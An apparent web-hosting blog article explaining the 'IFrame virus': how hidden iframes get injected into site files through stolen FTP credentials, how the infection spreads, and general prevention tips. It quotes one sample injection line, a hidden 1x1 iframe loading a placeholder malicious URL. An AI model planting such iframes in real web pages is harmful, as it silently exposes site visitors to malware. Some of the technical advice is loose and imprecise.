As we know, a virus is a malicious piece of code, embedded into the programmer’s code. This “bad” code could be in any programming language including HTML. As Internet has become an integral part of the milieu, with the increasing number of users, alarming number of hackers have turned up. The viruses coded by these hackers are designed to attack the various websites and inject malware into the system, with the single intention of corrupting the Internet usage.
What is the Iframe virus and what does it do?
The IFrame virus is the HTML code <IFrame> embedded into the source code of your webpage. It could be injected into any of the source files, be they html or php or active server pages. It may infect through, mainly, open source CMS (content management system) software like Joomla. The virus modifies the client’s host and access files, and creates dummy .php files in the images directory in the site directory. However, it can only infect those sites in the Web server to which it has access via passwords.
Usually, when the IFRAME code is inserted in the site’s index.* files in all directories, the code added might look like this:
<iframe src= “MALICIOUS_URL” width=1 height=1 style=”visibility:hidden;position:absolute”>
However, recently, it has come to be known, that the “bad” code could be a java script rather than the <IFRAME> tag html code.
What this code does is leave you with tons of iframes, or floating frames as we know them, on your web pages. Each of these Iframes lead to a malicious Web site which if successful leads to installation of malware on your computer.
Before the user realizes, his/her website is flagged as “Sites that may harm your computer” on Google
How it spreads?
Once the user’s PC is infected with the Iframe virus, it can infect other clients easily via FTP. Once it gets hold of another set of FTP username/password combination of another FTP client, it downloads the client’s index files, appends the spurious code into the files and anytime these files are accessed and uploaded, the Iframe virus gets active again. And so the cycle continues.
The Internet is full of news on the Iframe virus and the various cures for it.
There are open source “cure” software’s available, which claim to be able to remove this virus. Also there are many technical bloggers who will give you step by step solution for removing the virus. Alternatively, you may also seek help from your hosting service provider for assistance.
Usually, any robust Anti-virus built into the user’s system triggers off a “Malicious website” alarm and asks access to be denied to it when the Website reports this virus.
Therefore, it is essential for any Internet user to use verified and updated virus definition files of “non-pirated” Anti-virus software. Also, to ensure that this virus does not attack your code, as a programmer, steps should be taken to ensure that the code is free of any “SQL injection” or hard coded username/password combination. Proper encryption/decryption keys should be used to ensure the safety of the authentication. Cookies to store the username and password keys should ideally not be enabled.
Simple steps like these will ensure safe Internet access and prevent spread of any kind of virus through the Web.
This article was written and contributed by Joanna who has been part of web hosting search from last 2 years and following up with the web industry over 3 years now.